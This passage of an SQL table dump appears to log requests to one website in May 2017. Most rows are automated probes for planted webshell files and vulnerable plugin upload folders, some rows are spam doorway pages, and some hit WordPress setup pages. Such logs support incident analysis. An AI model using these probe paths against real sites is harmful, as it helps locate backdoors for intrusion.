00:00:00'),(10261,'http://hallcrestheights.org/wp-data.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:18:42','0000-00-00 00:00:00'),(10262,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=eDloN0tKLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:18:49','0000-00-00 00:00:00'),(10263,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=eDloN0tKLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:20:16','0000-00-00 00:00:00'),(10264,'http://hallcrestheights.org/wp-content/plugins/myshe.php?z3=eDloN0tKLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:20:22','0000-00-00 00:00:00'),(10265,'http://hallcrestheights.org/wp-content/plugins/wp-cache.php?z3=eDloN0tKLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:20:29','0000-00-00 00:00:00'),(10266,'http://hallcrestheights.org/wp-content/plugins/wp-footers.php?z3=eDloN0tKLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:20:35','0000-00-00 00:00:00'),(10267,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=eDloN0tKLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',4,0,'2017-05-26 00:19:19','0000-00-00 00:00:00'),(10268,'http://hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=eDloN0tKLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:19:23','0000-00-00 00:00:00'),(10269,'http://hallcrestheights.org/wp-content/plugins/SocketIontrol.php?z3=eDloN0tKLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:20:48','0000-00-00 00:00:00'),(10270,'http://hallcrestheights.org/wp-content/plugins/SocketIasrgasfontrol.php?z3=eDloN0tKLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:20:54','0000-00-00 00:00:00'),(10271,'http://hallcrestheights.org/wp-content/plugins/caches.php?z3=eDloN0tKLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:21:10','0000-00-00 00:00:00'),(10272,'http://hallcrestheights.org/head.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:21:14','0000-00-00 00:00:00'),(10273,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=eDloN0tKLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:21:26','0000-00-00 00:00:00'),(10274,'http://hallcrestheights.org/wp-content/plugins/morepaddy.php?z3=eDloN0tKLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:20:12','0000-00-00 00:00:00'),(10275,'http://hallcrestheights.org/cache/list.php?z3=eDloN0tKLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:21:39','0000-00-00 00:00:00'),(10276,'http://hallcrestheights.org/images/interface.php?z3=eDloN0tKLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:21:47','0000-00-00 00:00:00'),(10277,'http://hallcrestheights.org/sqldebug.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:20:33','0000-00-00 00:00:00'),(10278,'http://hallcrestheights.org/xmlrpc-activate.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:20:41','0000-00-00 00:00:00'),(10279,'http://hallcrestheights.org/keep.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:22:22','0000-00-00 00:00:00'),(10280,'http://hallcrestheights.org/tmpos.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:22:28','0000-00-00 00:00:00'),(10281,'http://hallcrestheights.org/link.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:22:35','0000-00-00 00:00:00'),(10282,'http://hallcrestheights.org/dcodzu.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:21:23','0000-00-00 00:00:00'),(10283,'http://hallcrestheights.org/codd.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:22:50','0000-00-00 00:00:00'),(10284,'http://hallcrestheights.org/cache/wcache7675n.PHP?z3=eDloN0tKLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:22:57','0000-00-00 00:00:00'),(10285,'http://hallcrestheights.org/modules/mod_bookmark/helper.php?z3=eDloN0tKLnBocA==&z4=L21vZHVsZXMvbW9kX2Jvb2ttYXJrLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:23:04','0000-00-00 00:00:00'),(10286,'http://hallcrestheights.org/content.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:23:11','0000-00-00 00:00:00'),(10287,'http://hallcrestheights.org/wp-content/plugins/sfn.php?z3=eDloN0tKLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:23:19','0000-00-00 00:00:00'),(10288,'http://hallcrestheights.org/wp-content/plugins/wp-lg3.php?z3=eDloN0tKLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:23:26','0000-00-00 00:00:00'),(10289,'http://hallcrestheights.org/wp-content/plugins/wp-lg2.php?z3=eDloN0tKLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:22:14','0000-00-00 00:00:00'),(10290,'http://hallcrestheights.org/shootmei.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:22:21','0000-00-00 00:00:00'),(10291,'http://hallcrestheights.org/dcodqg.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:23:47','0000-00-00 00:00:00'),(10292,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/x9h7KJ.php',NULL,'','',1,0,'2017-05-26 00:23:56','0000-00-00 00:00:00'),(10293,'http://hallcrestheights.org/wp-content/plugins/revslider/temp/update_extract/x9h7KJ.php',NULL,'','',1,0,'2017-05-26 00:24:01','0000-00-00 00:00:00'),(10294,'http://hallcrestheights.org/wp-content/uploads/x9h7KJ.php',NULL,'','',1,0,'2017-05-26 00:22:46','0000-00-00 00:00:00'),(10295,'http://hallcrestheights.org/x9h7KJ.php',NULL,'','',1,0,'2017-05-26 00:24:11','0000-00-00 00:00:00'),(10296,'http://hallcrestheights.org/sites/all/libraries/elfinder/files/x9h7KJ.php',NULL,'','',1,0,'2017-05-26 00:24:16','0000-00-00 00:00:00'),(10297,'http://www.hallcrestheights.org/zmkuedtz-jivyo-qxifgxuh-xptvuhm-k28480-iwnz-i20162630-korpv-ubfgnq.htm',NULL,'','',2,0,'2017-05-26 04:50:24','0000-00-00 00:00:00'),(10298,'http://www.hallcrestheights.org/edzvdlqc-omnnm-mcawvbfu-japyvrl-i20162629-flxh-qjkuh-k40900-kcmumb.htm',NULL,'','',4,0,'2017-05-26 04:55:48','0000-00-00 00:00:00'),(10299,'http://www.hallcrestheights.org/fadlajfn-k29380-lgfpc-vwgmyhde-cwxbdeu-dkov-i20162630-fiibp-tquhzx.htm',NULL,'','',1,0,'2017-05-26 08:42:27','0000-00-00 00:00:00'),(10300,'http://www.hallcrestheights.org/vqjnyspv-k35920-holjp-eurrtpil-uourxiv-i20162632-lbtr-hnnmt-qzkowt-sxpp-bgrrcdsi.htm',NULL,'https://www.google.co.jp/','',6,0,'2017-05-26 15:18:05','0000-00-00 00:00:00'),(10301,'http://www.hallcrestheights.org/k33776-edzvdl-i20162637-qcomnn-mmcawv-bfuj.htm',NULL,'','',2,0,'2017-05-27 02:01:55','0000-00-00 00:00:00'),(10302,'http://hallcrestheights.org//images/1ndex.php?z3=OFkzSGIyLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-05-27 04:03:04','0000-00-00 00:00:00'),(10303,'http://hallcrestheights.org//wp-cache.php?z3=OFkzSGIyLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-27 04:20:52','0000-00-00 00:00:00'),(10304,'http://hallcrestheights.org//includes.php?z3=OFkzSGIyLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 04:20:53','0000-00-00 00:00:00'),(10305,'http://hallcrestheights.org//SessionController.php?z3=OFkzSGIyLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-27 04:26:31','0000-00-00 00:00:00'),(10306,'http://hallcrestheights.org//webconfig.txt.php?z3=OFkzSGIyLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 04:26:38','0000-00-00 00:00:00'),(10307,'http://hallcrestheights.org//configurationbak.php?z3=OFkzSGIyLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-27 04:28:58','0000-00-00 00:00:00'),(10308,'http://hallcrestheights.org//sql_dump.php?z3=OFkzSGIyLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-27 04:32:57','0000-00-00 00:00:00'),(10309,'http://hallcrestheights.org//thumb.php?z3=OFkzSGIyLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-27 04:38:49','0000-00-00 00:00:00'),(10310,'http://hallcrestheights.org//images/1ndex.php?z3=YmFpWTVMLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-05-27 14:31:00','0000-00-00 00:00:00'),(10311,'http://hallcrestheights.org//sqlbak.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-27 14:32:38','0000-00-00 00:00:00'),(10312,'http://hallcrestheights.org//email.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 14:32:41','0000-00-00 00:00:00'),(10313,'http://hallcrestheights.org//functions.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 14:32:55','0000-00-00 00:00:00'),(10314,'http://hallcrestheights.org//cache/news.php?z3=YmFpWTVMLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 14:34:42','0000-00-00 00:00:00'),(10315,'http://hallcrestheights.org//tmp.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',4,0,'2017-05-27 14:34:53','0000-00-00 00:00:00'),(10316,'http://hallcrestheights.org//shootme.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 14:36:33','0000-00-00 00:00:00'),(10317,'http://hallcrestheights.org//configurationbak.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 14:36:43','0000-00-00 00:00:00'),(10318,'http://hallcrestheights.org//robots.txt.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 14:36:53','0000-00-00 00:00:00'),(10319,'http://hallcrestheights.org//jconfig.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-27 14:38:36','0000-00-00 00:00:00'),(10320,'http://hallcrestheights.org//media/reads.php?z3=YmFpWTVMLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 14:38:48','0000-00-00 00:00:00'),(10321,'http://hallcrestheights.org//media/1ndex.php?z3=YmFpWTVMLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-05-27 14:40:37','0000-00-00 00:00:00'),(10322,'http://hallcrestheights.org//sql_dump.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 14:40:41','0000-00-00 00:00:00'),(10323,'http://hallcrestheights.org//images/laj.php?z3=YmFpWTVMLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-27 14:40:54','0000-00-00 00:00:00'),(10324,'http://hallcrestheights.org//media/404.php?z3=YmFpWTVMLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 14:41:05','0000-00-00 00:00:00'),(10325,'http://hallcrestheights.org//media/tmp.php?z3=YmFpWTVMLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-05-27 14:43:01','0000-00-00 00:00:00'),(10326,'http://hallcrestheights.org//r3x.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 14:44:26','0000-00-00 00:00:00'),(10327,'http://hallcrestheights.org//log.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-27 14:44:39','0000-00-00 00:00:00'),(10328,'http://hallcrestheights.org//images/stories/0day.php?z3=YmFpWTVMLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 14:46:19','0000-00-00 00:00:00'),(10329,'http://hallcrestheights.org//includes/u2p.php?z3=YmFpWTVMLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 14:46:53','0000-00-00 00:00:00'),(10330,'http://hallcrestheights.org//images/xxx.php?z3=YmFpWTVMLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-05-27 14:47:13','0000-00-00 00:00:00'),(10331,'http://hallcrestheights.org//al277.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 14:48:50','0000-00-00 00:00:00'),(10332,'http://hallcrestheights.org//cache/cache_aqbmkwwx.php?z3=YmFpWTVMLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 14:48:59','0000-00-00 00:00:00'),(10333,'http://hallcrestheights.org//install.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-27 14:50:42','0000-00-00 00:00:00'),(10334,'http://hallcrestheights.org//dswat.org/wsdl.php?z3=YmFpWTVMLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',1,0,'2017-05-27 14:51:12','0000-00-00 00:00:00'),(10335,'http://hallcrestheights.org//robot.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-27 14:54:20','0000-00-00 00:00:00'),(10336,'http://hallcrestheights.org//wsdl.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 14:54:28','0000-00-00 00:00:00'),(10337,'http://hallcrestheights.org//goog1es.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-27 14:57:50','0000-00-00 00:00:00'),(10338,'http://hallcrestheights.org//site/tmp/cTivrC.php?z3=YmFpWTVMLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 14:58:01','0000-00-00 00:00:00'),(10339,'http://hallcrestheights.org//update.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 14:58:22','0000-00-00 00:00:00'),(10340,'http://hallcrestheights.org//includes.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 14:57:11','0000-00-00 00:00:00'),(10341,'http://hallcrestheights.org//wp-main.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 14:58:39','0000-00-00 00:00:00'),(10342,'http://hallcrestheights.org//news.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 14:59:12','0000-00-00 00:00:00'),(10343,'http://hallcrestheights.org//images/al277.php?z3=YmFpWTVMLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-27 14:59:28','0000-00-00 00:00:00'),(10344,'http://hallcrestheights.org//webconfig.txt.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 14:59:37','0000-00-00 00:00:00'),(10345,'http://hallcrestheights.org//cache/cachee.php?z3=YmFpWTVMLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 15:02:59','0000-00-00 00:00:00'),(10346,'http://hallcrestheights.org//thumb.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 15:04:36','0000-00-00 00:00:00'),(10347,'http://hallcrestheights.org//SessionController.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-27 15:09:42','0000-00-00 00:00:00'),(10348,'http://hallcrestheights.org//maill.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 15:09:46','0000-00-00 00:00:00'),(10349,'http://hallcrestheights.org//error-log.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 15:10:11','0000-00-00 00:00:00'),(10350,'http://hallcrestheights.org//authenticating.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 15:10:15','0000-00-00 00:00:00'),(10351,'http://hallcrestheights.org//google-assist.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-27 15:11:26','0000-00-00 00:00:00'),(10352,'http://hallcrestheights.org//images/google-assist.php?z3=YmFpWTVMLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-27 15:11:35','0000-00-00 00:00:00'),(10353,'http://hallcrestheights.org//images/robots.txt.php?z3=YmFpWTVMLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-27 15:12:56','0000-00-00 00:00:00'),(10354,'http://hallcrestheights.org//elements.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 15:13:07','0000-00-00 00:00:00'),(10355,'http://hallcrestheights.org//xmlsrpc.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 15:13:12','0000-00-00 00:00:00'),(10356,'http://hallcrestheights.org//wp-cache.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 15:13:25','0000-00-00 00:00:00'),(10357,'http://hallcrestheights.org//images/404.php?z3=YmFpWTVMLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-27 15:13:40','0000-00-00 00:00:00'),(10358,'http://hallcrestheights.org//images/head.php?z3=YmFpWTVMLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-27 15:14:02','0000-00-00 00:00:00'),(10359,'http://hallcrestheights.org//cache/support.php?z3=YmFpWTVMLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-05-27 15:12:53','0000-00-00 00:00:00'),(10360,'http://hallcrestheights.org//RoseLeif.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 15:16:00','0000-00-00 00:00:00'),(10361,'http://hallcrestheights.org//Abbrevsprl.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-27 15:16:26','0000-00-00 00:00:00'),(10362,'http://hallcrestheights.org//show.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-27 15:18:05','0000-00-00 00:00:00'),(10363,'http://hallcrestheights.org//images/defau1t.php?z3=YmFpWTVMLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-27 15:19:35','0000-00-00 00:00:00'),(10364,'http://hallcrestheights.org//cli/40dd1d.php?z3=YmFpWTVMLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-05-27 15:19:49','0000-00-00 00:00:00'),(10365,'http://hallcrestheights.org//infos.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-27 15:21:41','0000-00-00 00:00:00'),(10366,'http://hallcrestheights.org//cache/defau1t.php?z3=YmFpWTVMLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 15:21:57','0000-00-00 00:00:00'),(10367,'http://hallcrestheights.org//bookmark.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 15:20:56','0000-00-00 00:00:00'),(10368,'http://hallcrestheights.org//configbak.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 15:21:00','0000-00-00 00:00:00'),(10369,'http://hallcrestheights.org//wp-data.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 15:22:33','0000-00-00 00:00:00'),(10370,'http://hallcrestheights.org//wp-content/plugins/Fbrrchive.php?z3=YmFpWTVMLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-27 15:21:21','0000-00-00 00:00:00'),(10371,'http://hallcrestheights.org//wp-content/uploads/Fbrrchive.php?z3=YmFpWTVMLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-27 15:21:31','0000-00-00 00:00:00'),(10372,'http://hallcrestheights.org//wp-content/plugins/myshe.php?z3=YmFpWTVMLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-27 15:23:09','0000-00-00 00:00:00'),(10373,'http://hallcrestheights.org//wp-content/plugins/wp-cache.php?z3=YmFpWTVMLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-05-27 15:23:14','0000-00-00 00:00:00'),(10374,'http://hallcrestheights.org//wp-content/plugins/wp-footers.php?z3=YmFpWTVMLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-27 15:23:32','0000-00-00 00:00:00'),(10375,'http://hallcrestheights.org//wp-content/plugins/wpfootes.php?z3=YmFpWTVMLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-27 15:25:01','0000-00-00 00:00:00'),(10376,'http://hallcrestheights.org//wp-content/plugins/sql_dump.php?z3=YmFpWTVMLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-27 15:25:06','0000-00-00 00:00:00'),(10377,'http://hallcrestheights.org//wp-content/plugins/SocketIontrol.php?z3=YmFpWTVMLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-27 15:23:50','0000-00-00 00:00:00'),(10378,'http://hallcrestheights.org//wp-content/plugins/SocketIasrgasfontrol.php?z3=YmFpWTVMLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-27 15:23:59','0000-00-00 00:00:00'),(10379,'http://hallcrestheights.org//wp-content/plugins/Analyser.php?z3=YmFpWTVMLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-27 15:27:04','0000-00-00 00:00:00'),(10380,'http://hallcrestheights.org//cache/list.php?z3=YmFpWTVMLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 15:27:23','0000-00-00 00:00:00'),(10381,'http://hallcrestheights.org//bgeiis.php?z3=YmFpWTVMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-27 15:27:31','0000-00-00 00:00:00'),(10382,'http://hallcrestheights.org//modules/mod_simplefileuploadv1.3/elements/baiY5L.php',NULL,'','',1,0,'2017-05-27 15:32:53','0000-00-00 00:00:00'),(10383,'http://hallcrestheights.org//wp-content/plugins/revslider/temp/update_extract/baiY5L.php',NULL,'','',1,0,'2017-05-27 15:33:06','0000-00-00 00:00:00'),(10384,'http://hallcrestheights.org//wp-content/uploads/baiY5L.php',NULL,'','',1,0,'2017-05-27 15:33:20','0000-00-00 00:00:00'),(10385,'http://hallcrestheights.org//baiY5L.php',NULL,'','',1,0,'2017-05-27 15:33:23','0000-00-00 00:00:00'),(10386,'http://hallcrestheights.org//sites/all/libraries/elfinder/files/baiY5L.php',NULL,'','',1,0,'2017-05-27 15:33:43','0000-00-00 00:00:00'),(10387,'http://www.hallcrestheights.org/jgletkym-drqzn-rvmlkswa-i20162635-zvkecqq-neei-aqjzl-k44680-nplqfc.htm',NULL,'','',3,0,'2017-05-27 15:41:15','0000-00-00 00:00:00'),(10388,'http://www.hallcrestheights.org/fadla-jfnl-gfpc-vwgmyhde-cwxbdeud-i20162633-kovfii-bptqu-hzxchh-k884-rmxag-fpapuhg-fqvjdcl-bbvz.htm',NULL,'https://search.yahoo.co.jp/','',4,0,'2017-05-29 15:24:05','0000-00-00 00:00:00'),(10389,'http://www.hallcrestheights.org/k36337-xhajv-qlwczb-iqsos-qxoq-i20162636-kgqaqyd-cptznzvt-jqoevpca/',NULL,'','',1,0,'2017-05-29 22:52:03','0000-00-00 00:00:00'),(10390,'http://www.hallcrestheights.org/i20162636-k24380-gnfznxvj-xpalt-itjshkyj-yldpija.htm',NULL,'https://search.yahoo.co.jp/','',5,0,'2017-05-30 00:35:33','0000-00-00 00:00:00'),(10391,'http://hallcrestheights.org/web/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2017-05-30 02:07:14','0000-00-00 00:00:00'),(10392,'http://www.hallcrestheights.org/i20162632-k24920-jgletkym-drqzn-rvmlkswa-zvkecqq.htm',NULL,'https://search.yahoo.co.jp/','',1,0,'2017-05-30 03:00:43','0000-00-00 00:00:00'),(10393,'http://www.hallcrestheights.org/wordpress/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2017-05-30 03:46:39','0000-00-00 00:00:00'),(10394,'http://hallcrestheights.org/main/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2017-05-30 04:48:40','0000-00-00 00:00:00'),(10395,'http://hallcrestheights.org/news/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2017-05-30 05:44:24','0000-00-00 00:00:00'),(10396,'http://hallcrestheights.org/home/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2017-05-30 07:01:06','0000-00-00 00:00:00'),(10397,'http://www.hallcrestheights.org/vqjny-spvh-k1184-oljp-eurrtpil-uourxivl-i20162633-btrhnn.htm',NULL,'http://www.google.co.jp/','',5,0,'2017-05-30 11:45:54','0000-00-00 00:00:00'),(10398,'http://www.hallcrestheights.org/cms/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2017-05-30 13:56:20','0000-00-00 00:00:00'),(10399,'http://hallcrestheights.org/cms/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2017-05-30 14:19:34','0000-00-00 00:00:00'),(10400,'http://www.hallcrestheights.org/news/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2017-05-30 15:44:00','0000-00-00 00:00:00'),(10401,'http://hallcrestheights.org/new/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2017-05-30 16:14:04','0000-00-00 00:00:00'),(10402,'http://www.hallcrestheights.org/blog/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2017-05-30 19:19:16','0000-00-00 00:00:00'),(10403,'http://www.hallcrestheights.org/i20162632-k46520-mrcqgbei-fuwgr-abtnwyrq-semgwko.htm',NULL,'','',2,0,'2017-05-30 21:25:20','0000-00-00 